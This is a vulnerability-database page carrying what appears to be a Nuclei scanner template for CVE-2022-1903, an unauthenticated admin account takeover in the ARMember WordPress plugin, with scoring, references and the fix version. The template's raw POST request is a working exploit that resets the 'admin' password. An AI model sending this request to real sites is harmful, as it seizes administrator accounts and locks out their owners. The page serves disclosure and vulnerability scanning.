Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-1903
HistoryApr 21, 2023 - 8:56 a.m.

ARMember < 3.4.8 - Unauthenticated Admin Account Takeover

2023-04-2108:56:01
ProjectDiscovery
github.com
2
cve
cve2022
account-takeover
wpscan
wordpress
wp-plugin
armember-membership
unauthenticated
armemberplugin
wordpress-plugin
arbitrary-users
ajax-action
nonce-authorization
admin-access

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

8.1

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.7

Percentile

98.0%

The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username.
id: CVE-2022-1903

info:
  name: ARMember < 3.4.8 - Unauthenticated Admin Account Takeover
  author: theamanrawat
  severity: high
  description: |
    The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username.
  impact: |
    An attacker can gain unauthorized access to the admin account, potentially leading to further compromise of the system.
  remediation: Fixed in version 3.4.8
  reference:
    - https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08
    - https://wordpress.org/plugins/armember-membership/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1903
    - https://github.com/SYRTI/POC_to_review
    - https://github.com/WhooAmii/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2022-1903
    cwe-id: CWE-862
    epss-score: 0.70044
    epss-percentile: 0.98014
    cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: armemberplugin
    product: armember
    framework: wordpress
  tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Your Password has been reset"
          - "arm_success_msg"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a592aa7021a33a58048ae5b9854039b2adfe3e027ad816375945747f82012677022030dbf304d8fc28df57e33c8a5a5d0b158c77a0974fe171421d524cd9c60ecdbc:922c64590222798bb761d5b6d8e72950

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

8.1

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.7

Percentile

98.0%